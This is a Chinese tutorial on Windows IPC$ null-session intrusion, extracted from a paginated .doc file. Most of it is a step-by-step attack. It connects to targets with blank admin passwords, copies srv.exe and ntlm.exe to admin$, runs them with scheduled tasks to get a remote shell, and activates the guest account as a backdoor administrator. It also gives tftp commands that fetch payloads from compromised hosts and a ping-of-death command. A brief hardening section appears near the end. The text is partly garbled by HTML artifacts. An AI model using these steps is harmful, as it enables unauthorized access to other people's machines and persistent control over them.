与远程主机建立空管连接.doc

1、与主机建立管连接 （与远程主机建立空管连接） net use \\IP地址\ipc$ "" /use:"" （以管理员身份登录远程主机） net use \\IP地址\ipc$ "密码" /use:"Administrator" 1) 建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的

2、c盘映射为自己的z盘，其他盘类推) 如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$ 4)删除一个ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的c盘，其他盘类推 net use * /del 删除全部,会有提示要求按y确认 3 查看远程主机的共享资源（但看不到默认共享） net view \\IP   4 查看本地主机的共享资源（可以看到本地的默认共享） net share   5 得到远程主机的用户名列表 nbtst

3、at -A IP   6 得到本地主机的用户列表 net user   7 查看远程主机的当前时间 net time \\IP   8 显示本地主机当前服务 net start   9 启动/关闭本地服务 net start 服务名 /y net stop 服务名 /y   10 映射远程共享: net use z: \\IP\baby 此命令将共享名为baby的共享资源映射到z盘   11 删除共享映射 net use c: /del 删除映射的c盘，其他盘类推 net use * /del /y删除全部   12 向远程主机复制文

4、件 copy \路径\srv.exe \\IP\共享目录名，如： copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内   13 远程添加计划任务 at \\ip 时间 程序名，如： at \\127.0.0.0 11:00 love.exe 注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径 14 开启远程主机的telnet 这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求：   1）目标开启了ipc$共享   2）你要拥有管

5、理员密码和帐号   3）目标开启RemoteRegistry服务，用户就该ntlm认证   4）对WIN2K/XP有效，NT未经测试   命令格式：OpenTelnet.exe \\server account psw NTLM认证方式 port   试例如下：c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90   15 激活用户/加入管理员组   1 net uesr account /active:yes   2 net localgroup administrators account /add   16 关闭远程

6、主机的telnet   同样需要一个小程序：ResumeTelnet.exe   命令格式：ResumeTelnet.exe \\server account psw   试例如下：c:\>ResumeTelnet.exe \\*.*.*.* administrator ""   17 删除一个已建立的ipc$连接   net use \\IP\ipc$ /del 九 经典入侵模式 这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈) 1. C:\>net use \\127.0.0.1\IPC$ "" /use

7、r:"admintitrators" 这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。 复制之前务必用net view \\IP这个命令看一下对方的共享情况  2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\

8、winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。   3. C:\>net time \\127.0.0.1 查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。   4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）   5. C:\>net time \\127.0.0.1 再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午

9、 11:05，那就准备开始下面的命令。   6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了   7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。   8. C

10、\WINNT\system32>ntlm 输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！ 9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激

11、活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机) 另外,你也可以根据返回的错误号分析原因： 错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限； 错误号51，Windows无法找到网络路径：网络有问题； 错误号53，找不到网络路径：ip地址错误；目标

12、未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； 错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$； 错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连； 错误号1326，未知的用户名或错误密码：原因很明显了； 错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动； 错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码 2) 五 ipc$连接失败的原因 以下5个原因是比较常见的: 1)你的系统不是NT或以上操作系统

13、 2)对方没有打开ipc$默认共享 3)对方未开启139或445端口(惑被防火墙屏蔽) 4)你的命令输入有误(比如缺少了空格等) 5)用户名或密码错误(空连接当然无所谓了) 另外,你也可以根据返回的错误号分析原因： 错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限； 错误号51，Windows 无法找到网络路径 : 网络有问题； 错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； 错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；

14、 错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。 错误号1326，未知的用户名或错误密码 ： 原因很明显了； 错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况） 错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。 关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了. 六 如何打开目标的IPC$(此段引自相关文章) 首先你需要获得一个不依赖于ipc$的sh

15、ell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。 七 如何防范ipc$入侵 1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl

16、Set\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等) 2禁止默认共享 1）察看本地共享资源 运行-cmd-输入net share 2）删除共享(每次输入一个） net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete（如果有e,f,……可以继续删除） 3）停止server服务 net stop server /y （重新

17、启动后server服务会重新开启） 4）修改注册表 运行-regedit <> net use $">\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接 net use $">\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接 net use h: $">\\ip\c$Content$nbsp;"密码 ... net use $">\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接 net use $">\\ip\ipc$Content$nbsp;"

18、密码" /user:"用户名" 建立IPC非空链接 net use h: $">\\ip\c$Content$nbsp;"密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: net use h: $">\\ip\c$Content$nbsp;登陆后映射对方C：到本地为H: net use $">\\ip\ipc$Content$nbsp;/del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活gue

19、st用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务；(如:net start telnet， net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算

20、机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$Content$nbsp;开启ipc$共享 net share ipc

21、Content$nbsp;/del 删除ipc$共享 net share c$Content$nbsp;/del 删除C：共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况，常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/i

22、p协议使用情况） netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之pin

23、g) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A

24、H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 fc one.txt two.txt > 3st.txt 对比二

25、个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 finger username @host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP（属telnet登陆后的

26、命令） telnet 在本机上直接键入telnet 将进入本机的telnet copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 copy c:\srv.exe $">\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 co

27、py $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模

28、式）进行传送 tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机 ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出

29、全部信息 start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 mem 查看cpu使用情况 attrib 文件名(目录名) 查看某文件（目录）的属性 attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 6